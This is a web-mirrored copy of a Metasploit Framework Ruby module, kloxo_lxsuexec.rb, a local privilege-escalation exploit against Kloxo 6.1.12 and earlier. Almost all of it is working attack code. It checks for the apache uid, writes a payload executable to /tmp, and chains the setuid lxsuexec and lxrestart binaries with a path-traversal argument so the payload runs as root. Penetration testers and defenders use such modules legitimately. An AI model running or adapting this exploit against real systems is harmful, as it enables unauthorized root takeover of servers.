Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/linux/local/kloxo_lxsuexec.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::EXE
10
include Msf::Post::File
11
include Msf::Exploit::FileDropper
12
13
include Msf::Exploit::Local::Linux
14
15
def initialize(info = {})
16
super(
17
update_info(
18
info,
19
{
20
'Name' => 'Kloxo Local Privilege Escalation',
21
'Description' => %q{
22
Version 6.1.12 and earlier of Kloxo contain two setuid root binaries such as
23
lxsuexec and lxrestart, allow local privilege escalation to root from uid 48,
24
Apache by default on CentOS 5.8, the operating system supported by Kloxo.
25
This module has been tested successfully with Kloxo 6.1.12 and 6.1.6.
26
},
27
'License' => MSF_LICENSE,
28
'Author' => [
29
'HTP', # Original PoC according to exploit-db
30
'juan vazquez' # Metasploit module
31
],
32
'Platform' => [ 'linux' ],
33
'Arch' => [ ARCH_X86 ],
34
'SessionTypes' => [ 'shell' ],
35
'Payload' => {
36
'Space' => 8000,
37
'DisableNops' => true
38
},
39
'References' => [
40
[ 'EDB', '25406' ],
41
[ 'OSVDB', '93287' ],
42
[ 'URL', 'http://roothackers.net/showthread.php?tid=92' ] # post referencing the vulnerability and PoC
43
],
44
'Targets' => [
45
[ 'Kloxo 6.1.12', {} ]
46
],
47
'DefaultOptions' => {
48
'PrependSetuid' => true
49
},
50
'DefaultTarget' => 0,
51
'Privileged' => true,
52
'DisclosureDate' => '2012-09-18',
53
'Notes' => {
54
'Reliability' => UNKNOWN_RELIABILITY,
55
'Stability' => UNKNOWN_STABILITY,
56
'SideEffects' => UNKNOWN_SIDE_EFFECTS
57
}
58
}
59
)
60
)
61
end
62
63
def exploit
64
# apache uid (48) is needed in order to abuse the setuid lxsuexec binary
65
# .text:0804869D call _getuid
66
# .text:080486A2 cmp eax, 48
67
# .text:080486A5 jz short loc_80486B6 // uid == 48 (typically apache on CentOS)
68
# .text:080486A7 mov [ebp+var_A4], 0Ah
69
# .text:080486B1 jmp loc_8048B62 // finish if uid != 48
70
# .text:08048B62 loc_8048B62: ; CODE XREF: main+39j
71
# .text:08048B62 ; main+B0j
72
# .text:08048B62 mov eax, [ebp+var_A4]
73
# .text:08048B68 add esp, 0ECh
74
# .text:08048B6E pop ecx
75
# .text:08048B6F pop esi
76
# .text:08048B70 pop edi
77
# .text:08048B71 pop ebp
78
# .text:08048B72 lea esp, [ecx-4]
79
# .text:08048B75 retn
80
# .text:08048B75 main endp
81
print_status("Checking actual uid...")
82
id = cmd_exec("id -u")
83
if id != "48"
84
fail_with(Failure::NoAccess, "You are uid #{id}, you must be uid 48(apache) to exploit this")
85
end
86
87
# Write msf payload to /tmp and give provide executable perms
88
pl = generate_payload_exe
89
payload_path = "/tmp/#{rand_text_alpha(4)}"
90
print_status("Writing payload executable (#{pl.length} bytes) to #{payload_path} ...")
91
write_file(payload_path, pl)
92
register_file_for_cleanup(payload_path)
93
94
# Profit
95
print_status("Exploiting...")
96
cmd_exec("chmod +x #{payload_path}")
97
cmd_exec("LXLABS=`grep lxlabs /etc/passwd | cut -d: -f3`")
98
cmd_exec("export MUID=$LXLABS")
99
cmd_exec("export GID=$LXLABS")
100
cmd_exec("export TARGET=/bin/sh")
101
cmd_exec("export CHECK_GID=0")
102
cmd_exec("export NON_RESIDENT=1")
103
helper_path = "/tmp/#{rand_text_alpha(4)}"
104
write_file(helper_path, "/usr/sbin/lxrestart '../../..#{payload_path} #'")
105
register_file_for_cleanup(helper_path)
106
cmd_exec("lxsuexec #{helper_path}")
107
end
108
end
109
110